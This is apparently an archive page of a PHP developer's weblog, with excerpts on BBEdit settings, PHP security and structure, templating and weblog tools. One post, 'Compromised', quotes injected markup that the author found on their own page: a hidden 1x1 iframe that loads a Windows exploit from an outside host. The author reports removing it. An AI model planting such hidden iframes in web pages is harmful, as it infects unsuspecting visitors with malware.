Switcher

After 8 years of running on a homebrew system written over a weekend, I’ve decided to try someone else’s software. What I was after was: Commenting Most of my posts are link+comment, but if I write something longer than a paragraph, I wanted to throw the post open to feedback. But I didn’t want to [...]

Set BBEdit to lookup references for PHP functions

[ Steve Cooley via Peter Rukavina via Professional PHP ] Switch BBEdit to use the PHP website for the Find in Reference command:

% defaults write \
    com.barebones.bbedit Services:ADCReferenceSearchTemplate \
    "http://www.php.net/%@"

Transfer Scripts in PHP

I call them “routing scripts,” while Richard Davey calls them “transfer scripts.” They are a useful PHP technique.

Untainting in PHP

Chris Shiflett posted the slides from a recent talk on PHP security. He set up three security challenges (see the source files). He showed off something I had not noticed before. In htmlentities() you can declare an encoding. Shiflett has a straightforward approach to untainting user input:

$html = array();
$html['variable'] = htmlentities($_GET['variable'], ENT_QUOTES, "utf-8");
/* Code [...]

More Development Links

Dori Smith reminds us there’s a shiny Easter Egg in her Serenity Dashboard Widget. Chris Shiflett finished his book on PHP security for O’Reilly. I’m getting a copy and so are the rest of my team. Ryan Campbell wrote a short piece on how to degrade Ajax so your site still works with JavaScript turned [...]

PHP in the Gossip Pages

Only in Silicon Valley would the anniversary of a programming language make the gossip page of an alternative paper. From the San Jose Metro’s The Fly column: This summer is the 10th anniversary of PHP’s original release date, prompting parties among its champions in Quebec, Germany and Lerdorf’s Fremont home, where he drank champagne with [...]

Weblog Tool Bakeoff

Rafe’s looking at weblog management systems. He started with WordPress, and was asked to try out Movable Type too. Now he’s set up Movable Type, WordPress, S9Y, and Textpattern. I’m interested in his opinion because I’m weighing moving this weblog to one of those systems, or moving everything to LiveJournal where I have a [...]

Savant3: Simple Templating for PHP5

The Savant folks have a development version of their template system for PHP5. Savant doesn’t put a template language on top of PHP, instead, the templates are written in PHP and evaluated by Savant. Savant also likes objects, you can pass them directly into a template, unlike Smarty’s preference for arrays. The new version of [...]

PHP Application Structure

[ via Laughing Meme ] PHPGuru describes his method for setting up the folders of a new PHP application. The bonus: using the __FILE__ idiom to set up portable paths. He has this in his config.php:

<?php
$_PATHS["base"] = dirname(dirname(__FILE__)) . "/";
$_PATHS["includes"] = $_PATHS["base"] . "includes/";
$_PATHS["templates"] = $_PATHS["base"] . "templates/";
$_PATHS["pear"] = $_PATHS["base"] [...]

A 2004 Best of the Year Post

Earth is really full of things. — The King of All Cosmos, in Katamari Damacy It’s New Year’s Eve, and I didn’t play as much Katamari Damacy or World of Warcraft over the holiday break as I wanted. I was working on this end of the year post. Here’s my stab at a ‘best of [...]

Compromised

Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page.

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body>

The hidden iFrame loads a Windows exploit. I have it removed, for the time being. I don’t know how [...]

Where XML goes astray.

[ via Simon Willison ] Another Simon, a developer at Microsoft, writes about his surprise with all of the non-document applications of XML (SOAP, databases, configuration files) out there, and his experience with what he feels are the two problem areas of the original specification: whitespace handling and allowed characters. After writing a publishing tool [...]

Language Wars

I’m a little bothered by all the sniping between the various scripting language camps: Lisp bashes Python, Perl bashes PHP, everyone bashes Java. But anyone can walk up, hand $10 to a hosting company, and start serving PHP + MySQL applications. If you want to run Perl, Python, Ruby or anything else, you need to [...]

Installing non-stable PEAR packages

Kellan points out a feature of PEAR I’d missed. Packages such as XML_Serializer haven’t reached ‘stable’. So to install them, I’d been changing PEAR’s config to accept ‘beta’, then installing. Instead, you direct PEAR to install a specific version.

Marc Liyanage’s PHP 5 package available for testing

You may need to have MySQL installed to get it to work, but hell yeah! Update: this post refers to an older version of PHP5. Go to his main PHP page for the latest version.